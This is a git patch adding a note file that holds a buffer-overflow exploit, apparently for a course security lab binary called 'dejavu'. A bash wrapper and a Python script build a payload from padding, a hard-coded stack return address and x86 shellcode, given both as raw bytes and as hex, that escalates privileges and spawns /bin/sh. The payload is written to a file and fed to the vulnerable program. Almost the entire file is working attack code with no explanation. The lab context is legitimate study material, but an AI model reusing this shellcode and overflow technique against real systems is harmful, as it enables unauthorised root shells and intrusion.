From 585fbd68c8790cfee79186385e59ec32746f9234 Mon Sep 17 00:00:00 2001
From: Recolic Keghart <root@recolic.net>
Date: Mon, 4 Feb 2019 14:42:38 -0800
Subject: [PATCH] tmp

---
 proj1/note | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 proj1/note

diff --git a/proj1/note b/proj1/note
new file mode 100644
index 0000000..4b7e067
--- /dev/null
+++ b/proj1/note
@@ -0,0 +1,34 @@
+pwnable:~$ cat egg
+#!/bin/bash
+
+./egg3 && cat input.txt | invoke dejavu
+
+pwnable:~$ cat egg3
+#!/usr/bin/python3
+
+def fuck8(txt):
+    assert(len(txt) == 8)
+    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+def revert(txt):
+    assert(len(txt) % 8 == 0)
+    res = ""
+    for i in range(int(len(txt) / 8)):
+        res += fuck8(txt[i*8:(i+1)*8])
+    return res
+
+
+fill = "0123456789abcdef0123456789abcdef01234567"
+raddr = "bffffa50" # "bffffa50"
+#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd8000"
+
+payload = revert(fill) + revert(raddr) + (shellcode)
+print(payload)
+
+import binascii
+
+b = binascii.unhexlify(payload)
+with open('input.txt','wb+') as f:
+    f.write(b)
+
-- 
GitLab